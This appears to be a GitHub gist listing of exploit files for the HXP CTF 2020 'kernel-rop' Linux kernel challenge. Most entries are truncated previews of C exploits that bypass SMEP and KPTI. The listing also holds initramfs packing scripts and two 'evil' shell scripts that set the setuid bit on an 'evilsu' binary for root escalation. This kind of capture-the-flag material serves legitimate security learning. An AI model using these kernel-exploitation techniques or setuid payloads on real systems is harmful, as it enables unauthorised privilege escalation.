Don't scream

Bonan brant-ruan

@brant-ruan
brant-ruan / exploit_ret2usr.c
Last active September 5, 2022 04:51
HXP CTF 2020 >> kernel-rop | no SMEP/SMAP; no KPTI; no KASLR
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char *VULN_DRV = "/dev/hackme";
void spawn_shell();
int64_t global_fd = 0;
@brant-ruan
brant-ruan / exploit_bypass_kpti_with_signal_handler.c
Last active September 5, 2022 04:51
HXP CTF 2020 >> kernel-rop | bypass SMEP with kernel ROP; bypass KPTI with SIGSEGV handler; no KASLR
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
struct sigaction sigact;
char *VULN_DRV = "/dev/hackme";
void spawn_shell();
@brant-ruan
brant-ruan / exploit_bypass_kpti_with_trampoline.c
Last active September 5, 2022 04:51
HXP CTF 2020 >> kernel-rop | bypass SMEP with kernel ROP; bypass KPTI with KPTI trampoline; no KASLR
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
char *VULN_DRV = "/dev/hackme";
void spawn_shell();
#!/bin/bash
# Compress initramfs with the included statically linked exploit
in=$1
out=$(echo $in | awk '{ print substr( $0, 1, length($0)-2 ) }')
gcc $in -static -o $out || exit 255
mv $out initramfs
pushd . && pushd initramfs
find . -print0 | cpio --null --format=newc -o 2>/dev/null | gzip -9 > ../initramfs.cpio.gz
popd
#!/bin/bash
# Decompress a .cpio.gz packed file system
rm -rf ./initramfs && mkdir initramfs
pushd . && pushd initramfs
cp ../initramfs.cpio.gz .
gzip -dc initramfs.cpio.gz | cpio -idm &>/dev/null && rm initramfs.cpio.gz
popd
@brant-ruan
brant-ruan / leak_canary.c
Last active September 2, 2022 09:30
HXP CTF 2020 >> kernel-rop | partial exploit
#include <fcntl.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
char *VULN_DRV = "/dev/hackme";
@brant-ruan
brant-ruan / overwrite_return_address.c
Created September 2, 2022 09:44
HXP CTF 2020 >> kernel-rop | partial exploit
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char *VULN_DRV = "/dev/hackme";
int64_t global_fd = 0;
uint64_t cookie = 0;
@brant-ruan
brant-ruan / exploit_bypass_smep.c
Last active September 5, 2022 04:51
HXP CTF 2020 >> kernel-rop | no KPTI; no KASLR
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char *VULN_DRV = "/dev/hackme";
void spawn_shell();
int64_t global_fd = 0;
@brant-ruan
brant-ruan / evil
Last active September 5, 2022 04:51
[exploit_bypass_kpti_with_modprobe] HXP CTF 2020 >> kernel-rop | bypass SMEP with kernel ROP; bypass KPTI with modprobe; no KASLR
#!/bin/sh
mv /evilsu /tmp/evilsu
chmod u+s /tmp/evilsu
chmod 777 /evilsu
@brant-ruan
brant-ruan / evil
Last active September 5, 2022 04:51
[exploit_bypass_kpti_with_coredump] HXP CTF 2020 >> kernel-rop | bypass SMEP with kernel ROP; bypass KPTI with coredump; no KASLR
#!/bin/sh
mv /evilsu /tmp/evilsu
chmod u+s /tmp/evilsu
chmod 777 /evilsu